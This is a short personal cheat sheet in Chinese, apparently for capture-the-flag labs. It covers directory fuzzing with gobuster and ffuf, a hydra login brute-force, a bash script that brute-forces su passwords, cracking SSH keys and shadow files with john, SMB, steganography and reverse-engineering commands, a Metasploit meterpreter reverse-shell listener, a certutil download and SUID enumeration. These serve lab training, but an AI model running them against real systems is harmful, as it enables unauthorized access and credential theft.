目录

gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt

gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi带上后面的参数指定目录

ffuf -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.244.229/FUZZ

爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin:user=^USER^&pass=^PASS^:F=invalid" -V

su

爆破脚本加加

#!/bin/bash

set -m #enable job control
export TOP_PID=$$ #get the current PID
trap "trap - SIGTERM && kill -- -$$" INT SIGINT SIGTERM EXIT #exit on trap

# https://github.com/fearside/ProgressBar/blob/master/progressbar.sh
# something to look at while waiting
function progressbar {
        let _progress=(${1}*100/${2}*100)/100
        let _done=(${_progress}*4)/10
        let _left=40-$_done

        _done=$(printf "%${_done}s")
        _left=$(printf "%${_left}s")

        printf "\rCracking : [${_done// /#}${_left// /-}] ${_progress}%%"
}

function brute() {
        keyword=$1 #get the word
        password="PrettyS3cure${keyword}Password123." #add it to our format
        output=$( ( sleep 0.2s && echo $password ) | script -qc 'su johnsmith -c "id"' /dev/null) # check the password
        if [[ $output != *"Authentication failure"* ]]; then #if password was correct
                printf "\rCreds Found! johnsmith:$password\n$output\nbye..." #print the password
                kill -9 -$(ps -o pgid= $TOP_PID  | grep -o '[0-9]*') #kill parent and other jobs
        fi
}

wordlist=$1 #get wordlist as parameter

count=$(wc -l $wordlist| grep -o '[0-9]*') #count how many words we have
current=1

while IFS= read -r line #for each line
do
        brute $line & #try the password
        progressbar ${current} ${count} #update progress bar. TODO:calculate ETA
        current=$(( current + 1 )) #increment
done < $wordlist #read the wordlist

wait #wait for active jobs

使用:time bash a.sh wordlist

hash解密

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online
还有这个
Hash decoder and calculator (md5hashing.net)

Binary to Text Translator (rapidtables.com)
这个是解密二进制数据的
cyberchef也是能直接秒的

RSA解密

ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

解密shadow

先把passwd和shadow那行拿出来
unshadow passwd shadow >password
john password --wordlist=/usr/share/wordlists/rockyou.txt

smb

smbclient -L ip
smbclient \\\\ip\\name

隐写

就info和extract呗

steghide extract -sf jpg

逆向文件

r2 x.elf
aaa
afl
pdf@main

strings,一下就出来了,但是很乱

ghidra图形化界面,谁让我没有ida呢

现在有ida了

gdb

gdb crackme4
info  functions
b *0x0000000000400520 #打断点
run test
info registers
x/s 0x7fffffffe990 #上一步查看寄存器,这一步查看此处寄存器的值

rdp

xfreerdp /v:10.10.199.199

rdesktop 10.10.199.199

没找到好用的…

信息收集

钓鱼包等工具第一次出现的时间VirusTotal
总之用sha256sum 高搜一下

whoami历史找不到了
wp说可以ThreatBook,但是我不行了

渗透前保持个习惯吧

echo "10.10.82.45 mafialive.thm" | sudo tee -a /etc/hosts > /dev/null

解压压缩

sudo tar -czhvf wordlists.tar.gz -C /usr/share wordlists带上符号链接压缩

git

git log --pretty=oneline 查看所有提交

pwncat-cs

ctrl + D往返
listen -m linux port 开启多个监听
sessions id 换被控机

lcd 切换目录
download 下载
upload 上传

msf

一句话监听

msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 4444;set payload windows/meterpreter/reverse_tcp;run'

下载后渗透

windows

certutil -urlcache -f url filename

SUID

find / -user root -perm -4000 -print 2> /tmp/11



find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null